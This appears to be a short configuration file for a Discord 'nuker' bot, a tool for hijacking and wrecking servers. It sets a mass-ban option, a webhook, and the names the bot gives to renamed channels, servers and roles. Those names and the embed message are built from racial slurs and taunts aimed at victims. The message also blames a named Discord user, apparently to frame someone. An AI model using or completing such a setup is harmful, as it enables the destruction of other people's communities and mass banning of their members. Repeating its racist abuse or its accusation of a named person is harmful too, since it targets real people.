BOT_OWNER_ID="925834334009700453"

MASS_BAN=false

WEBHOOK_URL="Webhook URL"
AVATAR_URL="https://i.imgur.com/cOmcxRt.jpeg"

PREFERRED_LOCALE="el"

CHANNEL_NAME="NIGGA"
SERVER_NAME="NUKED BY SOME NEGRO RANDOM LMAO"
ROLE_NAME="GET FUCKED"


EMBED_TITLE="YOU'VE BEEN NUKED BY A NEGRO"
EMBED_DESCRIPTION="THIS IS ONE OF MANY SERVER THAT HAS BEEN NUKED! XDD \n get fucked. \n THIS MAY HAVE BEEN DESERVED. I'VE TARGETED MANY SERVER OWNERS, AND MY NUKES HAVE BEEN WITH A REASON! \n (btw you've been nuked by @noudthijssen.... or was it him?)"
